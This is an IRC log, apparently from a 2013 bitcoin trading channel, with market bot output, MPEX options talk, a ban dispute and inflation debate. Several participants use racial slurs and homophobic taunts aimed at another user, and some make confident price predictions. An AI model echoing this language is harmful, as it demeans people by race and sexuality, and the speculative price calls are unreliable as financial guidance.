20:37:05 BTCUSD ticker | Best bid: 91.63384, Best ask: 92.15621, Bid-ask spread: 0.52237, Last trade: 92.40000, 24 hour volume: 17296.36135741, 24 hour low: 90.21010, 24 hour high: 93.80000, 24 hour vwap: 92.48813 Mar 31 20:37:43 hmm Mar 31 20:38:00 [HAVELOCK] [SDICE] 1 @ 0.43997999 BTC [-] Mar 31 20:38:55 [MPEX] [S.MPOE] 14000 @ 0.00064772 = 9.0681 BTC [+] Mar 31 20:41:31 Looks like I picked the wrong morning to buy calls Mar 31 20:41:35 stupid Mar 31 20:42:31 it's okay, you can buy more in a few days Mar 31 20:42:49 wait for the dipppp Mar 31 20:44:01 !assbot are you gay? Mar 31 20:44:26 only when you are around. Mar 31 20:44:30 lol sup niggers? Mar 31 20:44:43 ahaha Mar 31 20:44:45 lol assbot your delay is suspect Mar 31 20:45:17 im on "holiday" Mar 31 20:45:29 this so-called holiday Mar 31 20:45:31 i miss "work" Mar 31 20:45:49 hell i miss mp even Mar 31 20:46:22 http://polimedia.us/dtng/c/src/136466777435.jpg there, special for you. Mar 31 20:46:32 i bought a phone that will give me internet and a laptop that will use it Mar 31 20:46:51 holy fuck i see a photo in chat! Mar 31 20:47:01 haha Mar 31 20:47:04 https://bitcointalk.org/index.php?topic=160785.0;all Mar 31 20:47:12 no photo this time Mar 31 20:47:14 people trying to be mpoe-pr two weeks later Mar 31 20:47:26 im pretty drunk now Mar 31 20:47:47 iv been impressed with stuff you have written in theh passed Mar 31 20:48:02 but it is just a waste now Mar 31 20:48:17 im on "holiday" Mar 31 20:48:32 ;;asks 95 Mar 31 20:48:32 There are currently 8927.9373 bitcoins offered at or under 95.0 USD, worth 842763.877288 USD in total. | Data vintage: 55.2377 seconds Mar 31 20:48:37 fuck Mar 31 20:48:41 ;;bids 90 Mar 31 20:48:41 There are currently 3779.9471 bitcoins demanded at or over 90.0 USD, worth 341641.165297 USD in total. | Data vintage: 64.1880 seconds Mar 31 20:49:03 mpsend me that link in about 2 weeks Mar 31 20:49:13 holy shit Mar 31 20:49:23 re import of private keys Mar 31 20:49:25 Too dangerous for easy access - do you really want to enable people stealing coins from newbies? Power users can already import private keys using the debug console. Mar 31 20:49:32 ? Mar 31 20:49:34 WHO THE FUCK LUKE JR Mar 31 20:49:43 don't tell me what's dangerous Mar 31 20:49:43 ?? Mar 31 20:49:47 bitcoin is inherently dangerous Mar 31 20:49:51 some newb on this chan benkay Mar 31 20:50:05 it it tiberslav? Mar 31 20:50:08 these assholes seem to want bitcoins to be a "safe" thing to do Mar 31 20:50:22 tiberslav vs bengay? Mar 31 20:50:27 if you want safe put your fiat into a bank Mar 31 20:50:41 i know who lukejr is Mar 31 20:50:48 brb need a new bot of black label Mar 31 20:50:49 i'm attempting to express outrage Mar 31 20:51:51 ? Mar 31 20:52:02 mp you drink some times/ Mar 31 20:52:33 sure. Mar 31 20:52:46 cool Mar 31 20:53:04 gribble left :/ Mar 31 20:53:21 is bengay tiberslav? Mar 31 20:54:03 man you wish you could rile me with that Mar 31 20:54:12 ;;ticker Mar 31 20:54:16 with what? Mar 31 20:54:19 hey d3 Mar 31 20:54:19 goddamnit Mar 31 20:54:21 nanotube: FIX Mar 31 20:54:22 but i've been called icy hot since high school Mar 31 20:54:31 nanotube: FIX Mar 31 20:54:33 nanotube: FIX Mar 31 20:54:33 nanotube: FIX Mar 31 20:54:33 nanotube: FIX Mar 31 20:54:33 nanotube: FIX Mar 31 20:54:49 d3 holy shit, its zombie day, be careful Mar 31 20:55:26 I am the immortal lord of the underworld and all that is evil Mar 31 20:55:36 kakobrekla : "They do 250gh a wait." Mar 31 20:55:47 spam detected Mar 31 20:55:52 <[\\\]> if gribble pings out Mar 31 20:55:53 or sumthn. Mar 31 20:55:56 <[\\\]> most likely, nanotube has too Mar 31 20:56:12 why so aggitated Mar 31 20:56:18 <[\\\]> no meds Mar 31 20:56:23 d3 i bought a mac book air Mar 31 20:57:21 lol is assbot human? Mar 31 20:57:34 fuckin gay rite nao Mar 31 20:57:39 [MPEX] [S.MPOE] 8295 @ 0.00064363 = 5.3389 BTC [-] Mar 31 20:57:40 lol Mar 31 20:57:41 [MPEX] [S.MPOE] 14850 @ 0.00064219 = 9.5365 BTC [-] Mar 31 20:57:44 hi kako Mar 31 20:57:53 [MPEX] [S.MPOE] 7755 @ 0.00063719 = 4.9414 BTC [-] Mar 31 20:58:00 hi chang sup Mar 31 20:58:06 :) Mar 31 20:58:21 im drinking a bot of whisky that will cover the weeks holiday Mar 31 20:59:13 ;;ticker Mar 31 20:59:18 ;;gribble Mar 31 20:59:26 he left Mar 31 20:59:51 i bought the first evar ordered bfl Mar 31 20:59:58 was i a fool? Mar 31 21:00:10 bfl asic btw Mar 31 21:00:22 im pretty sure it wasn;'t you, but Mar 31 21:00:31 2-300 btc ? wd to them lol. Mar 31 21:00:52 ? lol what? Mar 31 21:01:00 i bought the first evar ordered bfl Mar 31 21:01:06 bfl asic Mar 31 21:01:16 not fpga Mar 31 21:01:29 wd =? Mar 31 21:01:36 keep in mind im trahsed Mar 31 21:01:48 i asked em for bank transfer req..i have it looks like an order # on it..jody said no matter how long it takes to wire the money, they will keep my place in line..wonder if i should send it now.. Mar 31 21:02:06 i dont know Mar 31 21:02:26 i just had the opertunity to be first in line and was like fuck it sure Mar 31 21:02:57 what's the best decision we can talk ChaangNoi into, y'all? Mar 31 21:03:11 buying a bunch of MPOE? Mar 31 21:03:14 shorting BTC? Mar 31 21:03:20 lol Mar 31 21:03:30 [MPEX] [O.USD.P200T] 1000 @ 1.45869937 = 1458.6994 BTC Mar 31 21:03:48 bengay isnot tibersav! Mar 31 21:03:55 either of you from /g/ Mar 31 21:04:05 would anyone admit to that? Mar 31 21:04:08 be honest Mar 31 21:04:13 o.o Mar 31 21:04:24 that's like a house worth of puts Mar 31 21:04:28 benkay ight be from /g/ Mar 31 21:04:28 are we going down ? Mar 31 21:04:55 ChaangNoi wd = well done Mar 31 21:05:07 thanks Mar 31 21:05:17 s3052 suggests we are going down first before rising Mar 31 21:05:38 link to his post or sht the fuck up Mar 31 21:05:52 ya but s4420 says we're going up Mar 31 21:05:55 there's 9999 of them Mar 31 21:06:04 yay tiberiusiv returns Mar 31 21:06:08 my all time favorite troll Mar 31 21:06:10 that is why i asked for link , we can kill 1 at a time Mar 31 21:06:22 he's better than EskimoBob!!!! Mar 31 21:06:33 ? Mar 31 21:06:48 tibersav? i hear aids is bad in nigera Mar 31 21:06:58 can i send you some condoms? Mar 31 21:07:15 tiberiusiv: did give some good advice Mar 31 21:07:18 condomsare condoms Mar 31 21:07:23 invest in index funds Mar 31 21:07:44 lol tiberslav from mp, awesome Mar 31 21:07:45 < tiberiusiv> mircea probably faked last months losses just to keep the bondholders $ << are you kidding? the bot is easy to take advantage of when there are movements like last month Mar 31 21:07:58 eve as a fraud, he would't have to fake it Mar 31 21:08:05 tiberslav must be a mp troll if he supports him so Mar 31 21:08:13 he'd just have to trade against his bot in the known profitable way Mar 31 21:08:21 tiberslav why you love mp so?? Mar 31 21:08:28 tiberslav you a gay nigerian? Mar 31 21:08:43 ChaangNoi why are you so obsessed with homosexuals? Mar 31 21:08:48 i think mp is paying tiberiusiv Mar 31 21:08:50 tiberslav you an mp sock pupet? Mar 31 21:09:00 bengay im homosex forevar Mar 31 21:09:19 shit Mar 31 21:09:22 my evil plan. foiled. Mar 31 21:09:25 tiberslave is an mp drone Mar 31 21:09:27 the jig is up! Mar 31 21:09:31 the jig! Mar 31 21:09:39 tiberslave lulz Mar 31 21:09:44 YES Mar 31 21:09:47 im paying him in kakobrekla cupcakes Mar 31 21:09:59 they do 250 jiggajigz a wait. Mar 31 21:09:59 "I use icyhot these niggas bengay" Mar 31 21:10:01 hehe lotsa hashes Mar 31 21:10:14 lol Mar 31 21:10:27 fucking happy zombar day mother fuckerz Mar 31 21:11:29 icyhot: http://rapgenius.com/926211/Tito-lopez-mama-proud/I-stay-icy-hot-these-niggas-bengay Mar 31 21:11:53 !ticker m ^oix Mar 31 21:11:55 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 81.34382041 / 96.14661174 / 140.1904003 (3745 shares, 1,948.96 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 31 21:12:10 $vwap ^ Mar 31 21:12:12 smickles: ^OIX 1 day: no data 7 day: average: 96.14661174 high: 140.1904003 low: 81.34382041 volume: 3745 btc: 1948.9574312 30 day: no data Mar 31 21:12:15 less keys, same info Mar 31 21:12:26 mk the oix is back on track Mar 31 21:12:49 i will be honest im shocked we are this high, and even bullish on this long ass weekend Mar 31 21:12:53 it's so nice tnat someone besides myself in assets likes shitty rap music Mar 31 21:12:57 next week 150? Mar 31 21:13:06 ChaangNoi somebody was buying 200 calls. Mar 31 21:13:11 rap is where it's at yo Mar 31 21:13:16 i not shocked Mar 31 21:13:19 that's how I get all my investment advice is from rappers Mar 31 21:13:22 once 100 breaks Mar 31 21:13:47 haha what's the best investment advice you ever got from a rapper? Mar 31 21:13:49 100 after that the first reals resistance is 500 Mar 31 21:13:57 ChaangNoi: you should see the list of businesses that are accepting bitcoin Mar 31 21:13:59 tiberslav Mar 31 21:14:00 lol Mar 31 21:14:25 tiberslave iv seen he list of people sending millions to buy btc Mar 31 21:14:56 and i know the way the millions re trending Mar 31 21:15:08 tibersalve im a much better troll than you Mar 31 21:15:20 im such a good troll the peoopel here think im a memeber Mar 31 21:15:44 tiberslav want to short bt with an escrowed bet? Mar 31 21:15:58 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Mar 31 21:15:58 i haz 1000 btc i could lose Mar 31 21:16:18 pussy Mar 31 21:16:30 Why do you hate mircea_popescu tiberiusiv ? Mar 31 21:16:36 He's made a lot of people money. Mar 31 21:16:47 tiberslave is a jelly nigerian Mar 31 21:17:11 In all seriousness, mathematically that is not the case... Mar 31 21:17:22 that's only happened in August... Mar 31 21:17:56 that wasn't a nominal loss due to the bullish nature of the volatility... Mar 31 21:18:17 the btc that were deposited were worth 50-60% less than at the time of the reported "loss" Mar 31 21:18:29 i wish there was a palce i could buy virgins,,, h wait i need to go ontor Mar 31 21:18:47 you're missing the USD variable... Mar 31 21:19:43 where is mp? he should bring out his bitches or whips Mar 31 21:19:56 1 million of that was his own money... Mar 31 21:20:00 if not more Mar 31 21:20:15 couldn't you say the same about the FED? Mar 31 21:20:26 mp you haz more "meatinz"today? Mar 31 21:20:29 The FED does nothing but lose money...yet you still depend on them. Mar 31 21:20:44 [BTCTC] [GSDPT] 1 @ 0.0043 BTC [+] Mar 31 21:20:52 The FED prints 89bn a day Mar 31 21:21:25 dude Travelers Property casualty lost 1bn the month after Katrina in 2004 Mar 31 21:21:32 and that was AFTER screwing people out of flood insurance Mar 31 21:21:48 when a "disaster hits" insurance is going to lose money Mar 31 21:22:02 the only other option is to build an investment house of cards and distribute the exposure elsewhere Mar 31 21:22:09 i don even know how to pm in this mac Mar 31 21:22:11 I feel like you're missing the true purpose/value of MPOE Mar 31 21:22:34 that's like saying the risk model of ALL insurance is broken Mar 31 21:22:45 no they aren't Mar 31 21:22:50 NO THEY AREN'T Mar 31 21:23:09 yes if your name is usagi Mar 31 21:23:32 and again you go on to list AIG among other companies Mar 31 21:24:07 ;;gribble Mar 31 21:24:20 tiberslav how much is mp paying you? Mar 31 21:24:36 seconded Mar 31 21:24:44 yes I am gribble. why do you keep bothering me? Mar 31 21:24:52 lol Mar 31 21:25:00 ;;bids 0 Mar 31 21:25:02 [MPEX] [O.USD.P200T] 335 @ 1.45892277 = 488.7391 BTC [+] Mar 31 21:25:13 !gribble you is my bitch Mar 31 21:25:29 There are currently 34838375 bitcoins demanded at or over 0.0 USD, worth 9790953.35954 USD in total. | Data vintage: 0.0187 seconds Mar 31 21:25:29 Look at Bugpowder buying puts Mar 31 21:25:37 never buy puts Mar 31 21:25:45 Rule #1 Mar 31 21:25:49 did you all know johney walker wells platnium whisky now? Mar 31 21:25:51 hahhhahhaha Mar 31 21:26:03 bug you is a rish mofo Mar 31 21:26:09 I made the highest returns on puts Mar 31 21:26:24 Bugpowder: is a neuroscientist, he is rich regardless... Mar 31 21:26:29 lol Mar 31 21:26:33 science does not pay well Mar 31 21:26:34 bug made like 1 million usd in a month Mar 31 21:26:37 LIES Mar 31 21:26:43 Science never fails!!!!! Mar 31 21:26:44 loise Mar 31 21:26:46 lise Mar 31 21:26:48 lies Mar 31 21:26:54 buggggg.... Mar 31 21:27:04 wasit 2 million? Mar 31 21:27:12 3mil? Mar 31 21:27:15 4? Mar 31 21:27:18 I would have made that if I had put in my whole nut, rather than 105 Mar 31 21:27:19 10% Mar 31 21:27:27 ? Mar 31 21:27:53 kakobrekla: Diablo-D3 is banned from channel and wants to be let back in Mar 31 21:27:56 sorry Mar 31 21:28:03 This is a new month though... and the gox backlog is up to 8500 Mar 31 21:28:06 i flip out in usd and thai baht Mar 31 21:28:26 apparently science can't speal. Mar 31 21:28:37 mp lol Mar 31 21:28:52 not spealing is my tradmark Mar 31 21:29:09 it is the only way the cia can track me Mar 31 21:29:19 I have made about as much in bitcoins as I have in my entire career as a scientist (true story) Mar 31 21:29:20 did we just hit red ? Mar 31 21:29:45 bug what you do real life? Mar 31 21:29:49 So Bugpowder why not create a TV show Mar 31 21:29:54 Bugpowder the science guy Mar 31 21:30:01 or something that rhymes Mar 31 21:30:04 because only retards are on tv? Mar 31 21:30:19 im not kidding or trolling, bug just pm me Mar 31 21:30:33 has Havelock paid HIM div's yet? Mar 31 21:30:43 lol mo i was on tv once Mar 31 21:30:54 for national usa chess Mar 31 21:30:55 https://bitcointalk.org/index.php?topic=162481.msg1710496#msg1710496 Mar 31 21:30:59 the other jig is up Mar 31 21:31:18 fucking a Mar 31 21:31:24 fucking mac Mar 31 21:31:31 i clik nothing Mar 31 21:31:53 i dont knw how to open that link in a mac Mar 31 21:32:17 if mtgox crashes we all lose Mar 31 21:32:25 HOW WILL WE SELL ARE COIN? Mar 31 21:32:28 goat, right click? lol Mar 31 21:32:51 jurov no Mar 31 21:32:53 fail Mar 31 21:33:07 im pro all os Mar 31 21:33:15 i can get it to work Mar 31 21:33:18 cant Mar 31 21:33:22 Diablo-D3 is banned ?! Mar 31 21:33:33 from what? Mar 31 21:33:48 thestringpuller's weak trolling omg Mar 31 21:33:54 I'm not rolling Mar 31 21:33:55 ? Mar 31 21:33:57 he messaged me Mar 31 21:34:00 [HAVELOCK] [HIM] 1 @ 2.06 BTC [+] Mar 31 21:34:05 ?? Mar 31 21:34:05 14:26 Im banned in #bitcoin-assets Mar 31 21:34:06 14:26 ask assbot's owner to fix this Mar 31 21:34:06 14:27 What did you do? Mar 31 21:34:06 14:27 nothing Mar 31 21:34:06 14:27 and why are you asking me instead of kakobrekla? Mar 31 21:34:08 14:27 because this needs to be said in channel and you're available =P Mar 31 21:34:19 BOOM Mar 31 21:34:24 I'm not trolling Mar 31 21:34:24 kako you ban d3? Mar 31 21:34:25 um Mar 31 21:34:44 kako if so why? Mar 31 21:35:08 [21:56:10] spam detected Mar 31 21:35:25 o his fix it flood huh Mar 31 21:35:29 so random bat? Mar 31 21:35:29 d3 freaked out several lines earlier Mar 31 21:35:42 freaked out = ban? Mar 31 21:35:59 i'm curious what kako says, too Mar 31 21:36:27 [MPEX] [S.MPOE] 8750 @ 0.00064772 = 5.6676 BTC [+] Mar 31 21:39:10 ;;bc,24hprc Mar 31 21:39:10 Error: "bc,24hprc" is not a valid command. Mar 31 21:39:20 ;;ticker Mar 31 21:39:21 ugh Mar 31 21:39:26 BTCUSD ticker | Best bid: 92.30000, Best ask: 92.39999, Bid-ask spread: 0.09999, Last trade: 92.30000, 24 hour volume: 18678.78024216, 24 hour low: 90.50000, 24 hour high: 93.80000, 24 hour vwap: 92.42069 Mar 31 21:41:57 ;;bc,24hprc Mar 31 21:41:58 Error: "bc,24hprc" is not a valid command. Mar 31 21:42:03 what? Mar 31 21:42:13 nanotube: what happened to bc,24hprc? Mar 31 21:43:42 anyone care to explain the semantics of these puts on USD or tell me where I can find the info? Mar 31 21:44:01 damientrog: i can help Mar 31 21:44:08 great Mar 31 21:44:08 give me an example one, i'll explain it Mar 31 21:44:22 O.USD.P050T Mar 31 21:45:10 1 put contract for 1 btc expiring april 19 (last friday 'this' month), struck at 50 usd Mar 31 21:45:45 the time it expires is the last second of the last minute of the day Mar 31 21:46:32 so what are the returns when that happens? Mar 31 21:47:42 it returns 'spot' - strike in btc, if that is a positive amount Mar 31 21:47:54 damientrog, https://www.bitcoinforum.com/coinbr-com/call-option-calculation/msg2445/#msg2445 Mar 31 21:48:01 ^ i did a cheatsheet Mar 31 21:48:32 ah thanks guys, I want to understand what just happend to mc losing all that fortune Mar 31 21:48:38 I say 'spot', because mepx use the weighted, all market 24h average Mar 31 21:50:45 ah jurov, you're the owner of coinbr, nice to see the owners here of the exchanges, or fronts thereof Mar 31 21:50:52 ;;ticker Mar 31 21:51:02 BTCUSD ticker | Best bid: 92.30000, Best ask: 92.48298, Bid-ask spread: 0.18298, Last trade: 92.30000, 24 hour volume: 18458.17378448, 24 hour low: 90.50000, 24 hour high: 93.80000, 24 hour vwap: 92.44477 Mar 31 21:54:17 ;;calc .2242/.2022 Mar 31 21:54:17 1.10880316518 Mar 31 21:54:34 damn, mpoebot is offering a 10% better price than soebot Mar 31 21:57:02 smickles: use avgprc Mar 31 21:57:07 ;;help avgprc Mar 31 21:57:07 so you're betting on the value of btc with btc, the sooner you call or put on a value the better deal you can make Mar 31 21:57:07 (avgprc ) -- Returns volume-weighted average price data from MtGox. is a three-letter currency code, is the time window for the average, and can be '24h', '7d', or '30d'. Mar 31 21:57:14 ;;avgprc Mar 31 21:57:14 (avgprc ) -- Returns volume-weighted average price data from MtGox. is a three-letter currency code, is the time window for the average, and can be '24h', '7d', or '30d'. Mar 31 21:57:20 ;;avgprc usd 24 Mar 31 21:57:20 nanotube: there's a problem with that Mar 31 21:57:23 ;;avgprc usd 24hh Mar 31 21:57:26 ;;avgprc usd 24h Mar 31 21:57:26 Error: Data not available. Available currencies are SLL, USD, AUD, CHF, SEK, RUB, CNY, JPY, XRP, BRL, ILS, GBP, NZD, SGD, PLN, EUR, DKK, THB, HKD, CAD, and available timeframes are 24h, 7d, 30d. Mar 31 21:57:31 Error: Data not available. Available currencies are SLL, USD, AUD, CHF, SEK, RUB, CNY, JPY, XRP, BRL, ILS, GBP, NZD, SGD, PLN, EUR, DKK, THB, HKD, CAD, and available timeframes are 24h, 7d, 30d. Mar 31 21:57:35 >_> Mar 31 21:57:36 92.33 Mar 31 21:57:39 XD Mar 31 21:57:42 LOLOL Mar 31 21:57:46 nanotube: mpex uses the whole market weighted average, not just gox Mar 31 21:58:01 ;;bc,24hprc Mar 31 21:58:01 Error: "bc,24hprc" is not a valid command. Mar 31 21:58:14 smickles: well, bc,24hprc was from bitcoincharts, as is avgprc. same datafeed Mar 31 21:58:18 USD is for all USD markets Mar 31 21:58:26 and bc,24hprc was only for USD markets Mar 31 21:58:44 what is the difference, again? Mar 31 21:58:46 nanotube: ah, so it's the same thing :) Mar 31 21:58:53 smickles: yep :) Mar 31 21:59:00 same data, different command style Mar 31 21:59:12 when i say 'whole marke' i meant 'all usd exchanges on bitcoincharts' Mar 31 21:59:17 right :) Mar 31 21:59:33 ;;avgprc USD 24h Mar 31 21:59:39 92.33 Mar 31 21:59:46 ;;avgprc EUR 24h Mar 31 21:59:52 73.68 Mar 31 22:00:23 $unconfirmed Mar 31 22:00:25 smickles: 471 Mar 31 22:00:37 wow, lowest i've seen that in a while Mar 31 22:00:46 ;;bc,stats Mar 31 22:00:54 Current Blocks: 228959 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 864 blocks | Next Difficulty In About: 5 days, 12 hours, 4 minutes, and 35 seconds | Next Difficulty Estimate: 7351382.69866 | Estimated Percent Change: 9.79052 Mar 31 22:00:56 what's uncofirmed mean? Mar 31 22:01:00 [HAVELOCK] [VTX] 1 @ 0.601 BTC [-] Mar 31 22:01:09 unconfirmed txns on the network Mar 31 22:01:13 ah Mar 31 22:02:27 I love this wiki page: On 16 March 2013, a bank run began in the Republic of Cyprus after a proposed 'tax' was to be imposed on 19th March 2013. 6.7% of all assets under .100,000 were to be seized and 9.9% of all those above. Many members of the public decided to remove their money rather than pay for an economic crisis they had not caused. Mar 31 22:02:28 damientrog: You don't necessarily get a better return by buying early. There is a time * volatility premium built into the mpoebot's pricing model, that decays as expiration approaches. Typically the way you can get the highest leverage and returns are when buying options just before expiration followed by a big move Mar 31 22:02:57 ah, so the price is entirely decided by the bot Mar 31 22:03:17 thestringpuller: that's so NPOV Mar 31 22:03:21 or are options traded amongst the market as well? Mar 31 22:03:37 damientrog, you can write own options and sell them at any proice you want Mar 31 22:04:00 but so far nobody managed to match mpoebot's volume Mar 31 22:04:11 for example, look at the strikes, around 86 to 92 Mar 31 22:04:14 so if I now make a bid lower than the ask price it will either be bought when somebody sells his options or the bot lowers his price Mar 31 22:04:16 nothing is stopping someone from pricing mid market. But nobody has the capital to match the bot's volume Mar 31 22:04:25 correct Mar 31 22:04:30 smickles: NPOV? Mar 31 22:04:32 i'm offering some, but i don't have the capital for mpoebot's volume Mar 31 22:04:35 .. anymore :) Mar 31 22:04:45 oh neutral point of view Mar 31 22:04:59 dude this page is awesome Mar 31 22:05:01 thestringpuller: it's wikipedia's claim that they hold a Neutral Point Of View Mar 31 22:05:16 thanks for the help, now I understand Mar 31 22:05:18 http://en.wikipedia.org/wiki/List_of_bank_runs - it's almost as funny as reading about Action Park Mar 31 22:07:07 People complain about Bitcoin but seriously...this page Mar 31 22:07:40 thestringpuller: basically, wikipedia is ok until you actually consider the content Mar 31 22:08:29 true but I remember the Wachovia and WaMu failures. Mar 31 22:08:40 NEVER FORGET Mar 31 22:10:26 [BTCTC] [GSDPT] 2 @ 0.0043 = 0.0086 BTC [+] Mar 31 22:13:48 O.o srsly? http://www.reddit.com/r/sex/comments/1bcku1/my_hands_have_become_callused_and_rough_from/ Mar 31 22:22:43 some people Mar 31 22:25:41 [MPEX] [O.USD.P200T] 5 @ 1.45685701 = 7.2843 BTC [-] Mar 31 22:26:50 tomorrow break 100? Mar 31 22:27:02 iffy Mar 31 22:27:11 tomrrow hit 998 Mar 31 22:27:12 98 Mar 31 22:27:13 ? Mar 31 22:27:27 iffy Mar 31 22:27:35 tomorrow hit 95? Mar 31 22:27:39 hehe Mar 31 22:28:46 kakobrekla: that was a funny ban Mar 31 22:30:09 ;;ticker Mar 31 22:30:15 BTCUSD ticker | Best bid: 92.98999, Best ask: 93.00000, Bid-ask spread: 0.01001, Last trade: 93.00000, 24 hour volume: 17860.78532294, 24 hour low: 91.00000, 24 hour high: 93.80000, 24 hour vwap: 92.51072 Mar 31 22:31:06 i think we'll hover under 100 for a few days then start rising again Mar 31 22:31:47 like when we broke 50 Mar 31 22:32:06 ;;calc 200/1.16799 Mar 31 22:32:07 171.23434276 Mar 31 22:32:47 ;;calc 200/1.4568 Mar 31 22:32:47 137.287204833 Mar 31 22:32:55 jesus we were at 30 on March 1st? Mar 31 22:33:20 hehe Mar 31 22:33:52 possibly get another sell off before 100, with a temporary 10% dip Mar 31 22:34:27 ;;(200-90)/90 Mar 31 22:34:28 Error: "(200-90)/90" is not a valid command. Mar 31 22:34:34 ;;calc (200-90)/90 Mar 31 22:34:35 1.22222222222 Mar 31 22:37:16 ;;calc 200/2.4568 Mar 31 22:37:16 81.4067079127 Mar 31 22:37:17 -RichiH- [Global Notice] Hi all! Please see https://blog.freenode.net/2013/03/insert-witty-title-here/ or https://plus.google.com/104326727082310562426/posts/bBmTomwNsBU as you will all kill the blog with your dDoS, anyway. Mar 31 22:37:33 ah, no efin wonder Mar 31 22:38:22 ;;calc 200/2.16799 Mar 31 22:38:23 92.2513480228 Mar 31 22:39:19 !ticker Mar 31 22:39:19 Your actions are useless. Mar 31 22:39:23 ;;ticker Mar 31 22:39:29 BTCUSD ticker | Best bid: 92.98999, Best ask: 92.99998, Bid-ask spread: 0.00999, Last trade: 92.98999, 24 hour volume: 17963.33825555, 24 hour low: 91.00000, 24 hour high: 93.80000, 24 hour vwap: 92.51548 Mar 31 22:40:11 well, if the current trends hold, we will be above 200 in 2 weeks :) Mar 31 22:40:25 whats quickets/safest way to buy btc with usd Mar 31 22:40:31 i used to use dwolla/gox Mar 31 22:40:32 localbitcoins Mar 31 22:40:35 [MPEX] [S.MPOE] 8317 @ 0.00064626 = 5.3749 BTC [-] Mar 31 22:40:36 [MPEX] [S.MPOE] 513 @ 0.00063719 = 0.3269 BTC [-] Mar 31 22:41:34 oh nice Mar 31 22:43:05 ah this aint gonna work Mar 31 22:43:08 any other way Mar 31 22:44:43 dont use campx, i can tell you that Mar 31 22:44:53 campbx? Mar 31 22:44:58 what's wrong with campbx? Mar 31 22:45:35 took 3 weeks to deposit my btc, lost out on about a $3000USD price rise Mar 31 22:45:55 that was about the third delay i had with them Mar 31 22:46:09 the others didnt really cost me anything other than frustration Mar 31 22:47:00 not deposit my btc, sorry, deposit my USD Mar 31 22:49:04 I have no trouble with CampBx then again I'm from Atlanta so I guess they like the local support of mah money Mar 31 22:52:22 [BTCTC] [B.YABMC] 1 @ 0.01959 BTC [+] Mar 31 22:52:26 i want to buy with cash/atm Mar 31 22:52:40 [BTCTC] [SYNERGY] 3 @ 0.011 = 0.033 BTC [+] Mar 31 22:52:50 i have to make up for some bad trades a few weeks ago Mar 31 22:54:53 KRS1: have you tried #bitcoin-otc? Mar 31 22:55:35 yeaaah..i was thinking that..idk Mar 31 22:55:38 [BTCTC] [ASICMINER-PT] 1 @ 0.771994 BTC [-] Mar 31 22:57:21 for me, using -otc is like fishing Mar 31 22:58:18 sometimes you get a boot? Mar 31 23:03:34 well, i bait my hook and put it out there. if after a day of trying, i still haven't caught anything, I go to the market instead. Mar 31 23:04:20 though, in the case of actual fishing, it's been years since I haven't caught a fish within an hour of trying Mar 31 23:04:58 but you wouldn't know that unless i told you, so it's still a good analogy Mar 31 23:05:01 :D Mar 31 23:05:13 anyone wants to (re)invest to MPOE bonds passthrough? 1 hour left. Mar 31 23:08:13 till what ? Mar 31 23:11:09 DUDE Mar 31 23:11:35 TIL that the guy who won the 2011 nobel prize in economics thinks there should be 17 tillion in QE Mar 31 23:11:36 SWEET Mar 31 23:12:10 Paul Krugman Mar 31 23:12:15 This guy is insane. Mar 31 23:12:18 Fuck dis guy Mar 31 23:12:29 thestringpuller: the current mainstream view is that the economic problems will be soothed by printing lots of money Mar 31 23:12:47 None of that printed money is in the market yet. Mar 31 23:12:55 So what happens when it flows into the actual economy? Mar 31 23:12:55 oft cited example is the depressions staved off by people mining gold while we were on the gold standard Mar 31 23:13:15 The money supply has grown 300% Mar 31 23:13:36 basically, the idea is to inflate during economic downturns Mar 31 23:13:59 [HAVELOCK] [KCIM] 1 @ 1.01 BTC [-] Mar 31 23:14:03 that way, people spend money faster, and eventually you get thru the downturn Mar 31 23:15:02 whereas, if you didn't inflate the money, people would not spend as much or as fast, and the downturn would get significantly worse Mar 31 23:15:17 but what if we see real inflation? Mar 31 23:15:21 like 10-20% Mar 31 23:15:27 that's what they want Mar 31 23:15:34 To rob us? Mar 31 23:15:41 normal inflation is ~5% Mar 31 23:15:49 UGH Mar 31 23:15:51 downturn inflation is upwards of 10% Mar 31 23:16:21 and if the economy is doing really f-ing good, <5% Mar 31 23:16:29 to slow those fuckers down Mar 31 23:16:34 this seems iffy I am being told at 10% inflation Mar 31 23:16:39 treasury bonds lose half their value Mar 31 23:17:11 well, they don't want you to buy those bonds during a downturn Mar 31 23:17:28 they want you to buy them when all is good after the downturn Mar 31 23:18:00 during the dwonturn, they don't want you to save or invest, they want you to spend Mar 31 23:18:21 and 'you' is the rich people, prolly not really you Mar 31 23:18:48 [MPEX] [S.MPOE] 8900 @ 0.00063325 = 5.6359 BTC [-] Mar 31 23:18:55 the case you are presenting me makes me want to put all my money into bitcoin Mar 31 23:19:38 well, bitcoin might be a little risky for that Mar 31 23:19:47 just ran the dividends for DMC Mar 31 23:19:58 https://bitcointalk.org/index.php?topic=77469.msg1711100#msg1711100 Mar 31 23:31:55 ;;ticker Mar 31 23:32:01 BTCUSD ticker | Best bid: 93.10001, Best ask: 93.10500, Bid-ask spread: 0.00499, Last trade: 93.10001, 24 hour volume: 19029.16932908, 24 hour low: 91.00000, 24 hour high: 93.80000, 24 hour vwap: 92.57267 Mar 31 23:32:59 [HAVELOCK] [HIM] 6 @ 2.02 = 12.12 BTC [-] Mar 31 23:33:09 https://twitter.com/joerogan/status/317526394575917056 Mar 31 23:33:26 nice Mar 31 23:33:59 [HAVELOCK] [HIM] 9 @ 2.01 = 18.09 BTC [-] Mar 31 23:35:00 [HAVELOCK] [HIM] 25 @ 2 = 50 BTC [-] Mar 31 23:36:57 $moo Mar 31 23:36:59 smickles: It's starting to sound like Wal-Mart in here Mar 31 23:37:45 a billion dollar market Mar 31 23:37:52 witch charts and graphs and all Mar 31 23:37:56 dont forget. Mar 31 23:39:28 people are dumping HIM oh no Mar 31 23:39:35 post dividend hit Mar 31 23:42:16 asicminer looks profitable from what i am seeing..i dont have much info on them but seems ok Mar 31 23:42:24 are they still selling shares Mar 31 23:42:42 no Mar 31 23:42:59 you can probably get passthru on Bitfunder Mar 31 23:43:05 KRS1: shares are reseller ehre for example: https://bitfunder.com/asset/G.ASICMINER-PT Mar 31 23:43:11 *reselled here Mar 31 23:43:17 I dont recommend passthroughs Mar 31 23:43:22 passthrough owners cannot be trusted Mar 31 23:43:26 [BTCTC] [RSM] 27 @ 0.003099 = 0.0837 BTC [+] Mar 31 23:43:35 yeah i heard mixed things about bitfunder Mar 31 